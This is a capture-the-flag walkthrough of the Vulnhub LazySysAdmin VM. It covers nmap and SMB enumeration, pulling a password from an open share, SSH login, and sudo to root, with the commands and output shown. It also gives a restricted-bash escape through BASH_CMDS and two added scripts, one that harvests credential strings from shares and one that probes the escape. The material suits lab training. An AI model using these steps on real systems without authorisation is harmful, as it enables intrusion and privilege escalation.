Vulnhub LazySysAdmin Walkthrough


Quick write-up of LazySysAdmin, found here: https://www.vulnhub.com/entry/lazysysadmin-1,205/

This is labeled as “beginner-intermediate” but probably leaning more on the beginner side. Anyhow…let’s do this!

Basic nmap scan…

root@kali:~/vulnhub/lazysysadmin# nmap -sS -sV 172.16.115.134 -oA lazy

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 00:08 EST
Nmap scan report for 172.16.115.134
Host is up (0.00047s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 00:0C:29:CE:7D:7F (VMware)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.06 seconds

Check the basics…

root@kali:~/vulnhub/lazysysadmin# curl http://172.16.115.134/robots.txt
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/

Checking those directories yields nothing of interest…moving on. Let’s do a quick directory brute-force.

root@kali:~/vulnhub/lazysysadmin# gobuster -u http://172.16.115.134 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://172.16.115.134/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 301,302,307,403,500,200,204
[+] Expanded     : true
=====================================================
http://172.16.115.134/.htpasswd (Status: 403)
http://172.16.115.134/.hta (Status: 403)
http://172.16.115.134/.htaccess (Status: 403)
http://172.16.115.134/apache (Status: 301)
http://172.16.115.134/index.html (Status: 200)
http://172.16.115.134/info.php (Status: 200)
http://172.16.115.134/javascript (Status: 301)
http://172.16.115.134/old (Status: 301)
http://172.16.115.134/phpmyadmin (Status: 301)
http://172.16.115.134/robots.txt (Status: 200)
http://172.16.115.134/server-status (Status: 403)
http://172.16.115.134/test (Status: 301)
http://172.16.115.134/wordpress (Status: 301)
http://172.16.115.134/wp (Status: 301)
=====================================================

WordPress, phpinfo, phpmyadmin…noted. Let’s see what else we can find on this box. We saw TCP 139 and 445 open. Let’s probe them with enum4linux.

root@kali:~/vulnhub/lazysysadmin# enum4linux 172.16.115.134
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Nov  6 00:39:14 2017

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 172.16.115.134
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 172.16.115.134    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

[...SNIP...]
 =========================================== 
|    Share Enumeration on 172.16.115.134    |
 =========================================== 
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

  Sharename       Type      Comment
  ---------       ----      -------
  print$          Disk      Printer Drivers
  share$          Disk      Sumshare
  IPC$            IPC       IPC Service (Web server)

  Server               Comment
  ---------            -------

  Workgroup            Master
  ---------            -------
  WORKGROUP            LAZYSYSADMIN

[+] Attempting to map shares on 172.16.115.134
//172.16.115.134/print$	Mapping: DENIED, Listing: N/A
//172.16.115.134/share$	Mapping: OK, Listing: OK
//172.16.115.134/IPC$	Mapping: OK	Listing: DENIED
[...SNIP...]
S-1-22-1-1000 Unix User\togie (Local User)

Well…that looks interesting: share$ maps and lists with no credentials at all. Leaving a share open like that is something a Lazy Sys Admin might do. We also have a local user named “togie.” Let’s see what we can find in the share.

First, we mount the share, and then start poking around…

root@kali:~/vulnhub/lazysysadmin# mkdir /mnt/cifs
root@kali:~/vulnhub/lazysysadmin# mount -t cifs //172.16.115.134/share$ -o username=guest /mnt/cifs/
root@kali:~/vulnhub/lazysysadmin# ls /mnt/cifs/
Backnode_files  apache  deets.txt  index.html  info.php  old  robots.txt  test  todolist.txt  wordpress  wp
root@kali:~/vulnhub/lazysysadmin# cat /mnt/cifs/deets.txt 
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345
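Reading files off the share one at a time works on a box this small, but on a real engagement you want the whole share pulled down and triaged in one go. The following is an added example, not part of the original write-up: it mirrors a guest-readable share with smbclient (real smbclient syntax, but the host, share name and local directory are parameters you supply) and then greps the local copy for lines that tend to sit next to secrets, which would have surfaced deets.txt without opening anything by hand.

```shell
#!/bin/sh
# Added example, not from the original write-up: mirror a share that allows
# guest access, then triage the loot for credential-looking lines. HOST,
# SHARE and LOCALDIR are caller-supplied; only the usage line below refers
# to the VM in the write-up.

# pull_share HOST SHARE LOCALDIR: recursive, non-interactive download as the
# null (guest) session. -N skips the password prompt; "recurse ON" plus
# "prompt OFF" lets "mget *" walk subdirectories without asking per file.
pull_share() {
    host=$1; share=$2; dest=$3
    mkdir -p "$dest" || return 1
    smbclient "//$host/$share" -N -c "recurse ON; prompt OFF; lcd $dest; mget *"
}

# triage_loot DIR: print file:line:text for hits on words that usually sit
# next to secrets. -I skips binary files, -i ignores case, the sort keeps the
# output order stable so it can be diffed between runs.
triage_loot() {
    dir=$1
    grep -rniIE '(passw(or)?d|pwd|passphrase|secret|token|api[_-]?key)' "$dir" | sort
}

# Usage (the share name is the one enum4linux reported above):
#   pull_share 172.16.115.134 'share$' ./loot && triage_loot ./loot
```

The regex is deliberately loose: on a web root it will also flag WordPress config files and phpMyAdmin settings, which is exactly the kind of noise you want to see at this stage.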

The share turns out to be the web root itself (the same directories robots.txt pointed at), plus a note with a password in it. Surely, 12345 can’t be a real user’s password? How about a lazy sysadmin’s password? Let’s try it with the user we found earlier…

root@kali:~/vulnhub/lazysysadmin# ssh togie@172.16.115.134
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################

togie@172.16.115.134's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Nov  6 16:01:52 AEST 2017

  System load:  0.0               Processes:           179
  Usage of /:   46.1% of 2.89GB   Users logged in:     0
  Memory usage: 33%               IP address for eth0: 172.16.115.134
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

133 packages can be updated.
0 updates are security updates.
togie@LazySysAdmin:~$

/facepalm

Ok…now we’re in as togie. Does this user have sudo access? Listing the rules first (sudo -l) is the tidier check, but here we just go straight for a root shell and reuse the same password.

togie@LazySysAdmin:~$ sudo su
[sudo] password for togie: 
root@LazySysAdmin:/home/togie#
root@LazySysAdmin:/home/togie# ls /root
proof.txt
root@LazySysAdmin:/home/togie# cat /root/proof.txt 
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done 🙂

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

/doublefacepalm…apparently it does. Game over!

There were a few rabbit holes you could’ve gone down on this VM. One being that if you didn’t try for sudo access right away, you would’ve noticed that togie was configured to use /bin/rbash, or “restricted bash,” which refuses things like cd, changing PATH or SHELL, running commands whose names contain a slash, and redirecting output.

togie@LazySysAdmin:~$ cd /tmp
-rbash: cd: restricted
togie@LazySysAdmin:~$ echo $SHELL
/bin/rbash

One easy way I’ve found to escape rbash is due to a bug in which the BASH_CMDS array (bash’s hashed-command table, a shell variable rather than an environment variable) is writable from within rbash, so you can bind an arbitrary command name to an unrestricted /bin/bash and then just call that name. Whether it works depends on the target’s bash version: Ubuntu 14.04 ships bash 4.3, which is affected, while newer bash releases refuse the assignment in restricted mode. I stumbled across this in my OSCP travels, and my inner 12 year-old appreciates it because I get to call it the “poop” vulnerability. See why: https://lists.gnu.org/archive/html/bug-bash/2017-03/msg00076.html

Anyhow…if we execute what is shown in the link, we confirm that we can escape rbash.

root@kali:~/vulnhub/lazysysadmin# ssh togie@172.16.115.134
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################

togie@172.16.115.134's password: 
[...SNIP...]
togie@LazySysAdmin:~$ cd /tmp
-rbash: cd: restricted
togie@LazySysAdmin:~$ BASH_CMDS[poop]=/bin/bash
togie@LazySysAdmin:~$ poop
togie@LazySysAdmin:~$ cd /tmp
togie@LazySysAdmin:/tmp$ ls -lah
total 8.0K
4.0K drwxrwxrwt  2 root root 4.0K Nov  6 16:17 .
4.0K drwxr-xr-x 22 root root 4.0K Aug 21 20:10 ..
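Since this escape only works on bash builds that still allow the BASH_CMDS assignment in restricted mode, it is worth probing before building an attack chain on it. The script below is an added example, not part of the original write-up or of any bash tooling: it runs a throwaway restricted child of a given bash binary, first confirms that restricted mode is really on (cd must fail), then attempts the same BASH_CMDS trick shown above and reports whether the child it spawns is unrestricted. The function name and the result strings are my own.

```shell
#!/bin/sh
# Added example, not from the original write-up: probe whether a bash binary
# still permits the BASH_CMDS rbash escape. Nothing persistent is changed;
# the escape is only attempted inside a throwaway "bash -r -c" child.
#
# probe_bash_cmds_escape [BASH]
#   BASH defaults to whatever "bash" resolves to on PATH.
#   Prints one of: no-bash, not-restricted, escape-works, escape-blocked
#   Exit status: 0 = escape works, 1 = blocked, 2 = could not test
probe_bash_cmds_escape() {
    bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || { echo "no-bash"; return 2; }
    bash_path=$(command -v "$bash_bin")

    # Sanity check: in a real restricted shell "cd" is refused, so if this
    # succeeds we are not testing rbash at all and the result would mean nothing.
    if "$bash_bin" -r -c 'cd /' 2>/dev/null; then
        echo "not-restricted"; return 2
    fi

    # The escape: from inside the restricted child, bind a fake command name
    # in BASH_CMDS to the absolute path of bash (passed in as $1 because a
    # slash in a typed command name would itself be refused by rbash), then
    # call it. The spawned bash is a fresh, unrestricted instance, so "cd"
    # works there and the marker is printed.
    out=$("$bash_bin" -r -c 'BASH_CMDS[poop]=$1; poop -c "cd / && echo ESCAPED"' \
          _ "$bash_path" 2>/dev/null) || true
    if [ "$out" = "ESCAPED" ]; then
        echo "escape-works"; return 0
    fi
    echo "escape-blocked"; return 1
}

# Usage on the target (or against a copied binary):
#   probe_bash_cmds_escape /bin/bash
```

If the probe reports escape-blocked, the target’s bash already refuses the BASH_CMDS assignment in restricted mode and you need a different route out of rbash; the probe says nothing about those other routes, only about this one.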

I didn’t experiment with any other methods of privilege escalation, but I suspect there’s one more…perhaps if I have time, I’ll go back and check it out.